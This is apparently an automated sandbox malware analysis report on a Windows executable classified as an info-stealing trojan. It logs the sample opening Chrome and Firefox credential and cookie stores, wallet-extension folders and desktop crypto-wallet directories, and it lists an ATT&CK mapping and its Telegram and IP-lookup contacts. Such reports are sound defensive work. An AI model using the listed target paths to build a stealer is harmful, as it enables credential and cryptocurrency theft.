                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafch
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpeiJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbbJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmndedJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajgJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior

Remote Access Functionality

Source: Yara match | File source: 888.exe, type: SAMPLE
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0.0.888.exe.f90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.888.exe.f90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2711187553.0000000000974000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2711187553.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2710106623.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2711570869.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2709905866.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2710305791.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2710305791.0000000000973000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2710106623.000000000095D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2710587236.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2709905866.000000000094F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 888.exe PID: 5752, type: MEMORYSTR
ATT&CK Matrix (a leading number is the count of matched signatures for that technique; cells without a number are unmatched template entries)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 31 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | 3 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 23 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
888.exe | 53% | ReversingLabs | Win32.Trojan.Barys
888.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://cdn.ipwhois.io/flags/us.svg | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipwho.is | 108.181.61.49 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ipwho.is/?output=json | 888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ipwho.is/?output=jsonF | 888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ipwho.is/?output=jsonFx | 888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://docs.rs/getrandom#nodejs-es-module-support0 | 888.exe | false | | high
https://docs.rs/getrandom#nodejs-es-module-support | 888.exe | false | | high
http://www.w3.or | 888.exe | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ns.adobe. | 888.exe | false | | high
https://www.ecosia.org/newtab/ | 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ipwhois.io/flags/us.svg | 888.exe, 00000000.00000002.2711121286.000000000094F000.00000004.00000020.00020000.00000000.sdmp; 888.exe, 00000000.00000003.2710271153.000000000094F000.00000004.00000020.00020000.00000000.sdmp; 888.exe, 00000000.00000003.2709905866.000000000094F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
108.181.61.49 | ipwho.is | Canada | 852 | ASN852CA | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574586
Start date and time: 2024-12-13 12:44:45 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 888.exe
Detection: MAL
Classification: mal84.troj.spyw.evad.winEXE@4/15@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 888.exe
                                                        No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com | malicious | HTMLPhisher |
149.154.167.220 | XClient.exe | malicious | XWorm |
149.154.167.220 | file.exe | malicious | Discord Token Stealer, Millenuim RAT |
149.154.167.220 | Ziraat Bankasi Swift Mesaji.exe | malicious | MassLogger RAT |
149.154.167.220 | installer.exe | malicious | Unknown |
149.154.167.220 | installer.exe | malicious | Unknown |
149.154.167.220 | file.exe | malicious | Unknown |
149.154.167.220 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar |
149.154.167.220 | file.exe | malicious | Unknown |
108.181.61.49 | Cracker.exe | malicious | Luca Stealer | /?output=json
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.telegram.org | https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com | malicious | HTMLPhisher | 149.154.167.220
api.telegram.org | XClient.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | file.exe | malicious | Discord Token Stealer, Millenuim RAT | 149.154.167.220
api.telegram.org | Ziraat Bankasi Swift Mesaji.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | installer.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | installer.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | file.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar | 149.154.167.220
api.telegram.org | file.exe | malicious | Unknown | 149.154.167.220
ipwho.is | https://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156 | malicious | TechSupportScam | 108.181.61.49
ipwho.is | Loader.exe | malicious | Quasar | 108.181.61.49
ipwho.is | Hydra.ccLoader.bat | malicious | Unknown | 108.181.61.49
ipwho.is | full.exe | malicious | Quasar | 108.181.61.49
ipwho.is | https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938 | malicious | TechSupportScam | 108.181.61.49
ipwho.is | file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm | 103.126.138.87
ipwho.is | TeudA4phjN.exe | malicious | Quasar | 103.126.138.87
ipwho.is | http://www.sbh.co.uk/ | malicious | HTMLPhisher, TechSupportScam | 103.126.138.87
ipwho.is | file.exe | malicious | Quasar | 103.126.138.87
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com | malicious | HTMLPhisher | 149.154.167.220
  | XClient.exe | malicious | XWorm | 149.154.167.220
  | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 149.154.167.99
  | file.exe | malicious | Discord Token Stealer, Millenuim RAT | 149.154.167.220
  | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 149.154.167.99
  | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 149.154.167.99
  | Ziraat Bankasi Swift Mesaji.exe | malicious | MassLogger RAT | 149.154.167.220
  | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 149.154.167.99
  | installer.exe | malicious | Unknown | 149.154.167.220
ASN852CA | https://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156 | malicious | TechSupportScam | 108.181.61.49
  | Loader.exe | malicious | Quasar | 108.181.61.49
  | arm7.nn-20241213-0355.elf | malicious | Mirai, Okiru | 50.98.219.123
  | Hydra.ccLoader.bat | malicious | Unknown | 108.181.61.49
  | full.exe | malicious | Quasar | 108.181.61.49
  | jew.sh4.elf | malicious | Unknown | 75.158.230.151
  | mpsl.elf | malicious | Mirai | 198.166.177.229
  | mips.elf | malicious | Mirai | 142.41.252.248
  | https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938 | malicious | TechSupportScam | 108.181.61.49
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | https://opof.utackhepr.com/WE76L1u/ | malicious | Unknown | 149.154.167.220
  | taskhost.exe | malicious | XWorm | 149.154.167.220
  | XClient.exe | malicious | XWorm | 149.154.167.220
  | Loader.exe | malicious | Quasar | 149.154.167.220
  | smb.ps1 | malicious | Xmrig | 149.154.167.220
  | j87MOFviv4.lnk | malicious | Unknown | 149.154.167.220
  | DvGZE4FU02.lnk | malicious | Unknown | 149.154.167.220
  | j3z5kxxt52.lnk | malicious | Unknown | 149.154.167.220
  | zpbiw0htk6.lnk | malicious | Unknown | 149.154.167.220
                                                                          No context
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):0.7307872139132228
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlllule//l:NllU+
                                                                          MD5:F3E50284A5DDB75A262B65844F4FAB1B
                                                                          SHA1:F6DA5603EE20F99A9BD4BB0948D9A622752AE5F3
                                                                          SHA-256:E39BAB6FD654762AB2B5D58A78A1F88EBE6D1DFC824F63CA43DC4930C2AD8411
